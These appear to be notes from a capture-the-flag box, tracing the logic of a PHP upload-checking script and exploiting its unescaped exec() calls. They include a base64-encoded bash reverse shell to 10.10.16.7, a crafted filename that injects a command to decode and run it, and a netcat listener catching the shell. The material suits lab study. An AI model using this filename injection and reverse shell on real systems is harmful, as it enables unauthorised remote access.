5 check_attack.php

# file: lib.php
getnameCheck($value) | 10_10_16_7.php.png
=> same as before LITERALLY.
	pieces = array(split on '.') | Array ( [0] => 10_10_16_7 [1] => php [2] => png ) 
	name = pieces[0] | 10_10_16_7
	name = replace '_' with '.' | 10.10.16.7
	ext = join the remaining pieces with '.' after removing the 1st element |  php.png
	return name, ext
	
check_ip($name, $ext) | name=IP, ext=filename
	check if name is an IP using FILTER_VALIDATE_IP
		msg = filename
		return true, msg
	else => 
		return false, attack on file <file>: not valid IP
	
loads all files in /var/www/html/uploads/
	if file = 'index.html' => do nothing
	
	getnameCheck() | returns name=IP, ext=extension
	check = check_ip | returns true,filename
	
	if check[0] is false,
		create /tmp/attack.log with file contents
		exec("rm -f $logpath");
		exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
		echo "rm -f $path$value\n";
		send mail $to $subject $msg $headers
	
# we control the parameter $value (the filename) in this file; it is interpolated into the exec() calls above without escapeshellarg(), which is the missing check

# tried running this file locally, and for any newly created file
# the IP check breaks because the filename is split on the first '.'
# base64

$ echo -n 'bash -c "bash -i >/dev/tcp/10.10.16.7/9005 0>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi

$ touch -- ';echo YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi|base64 -d | bash'
$ nc -lvnp 9005
listening on [any] 9005 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.146] 34270
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
whoami
guly
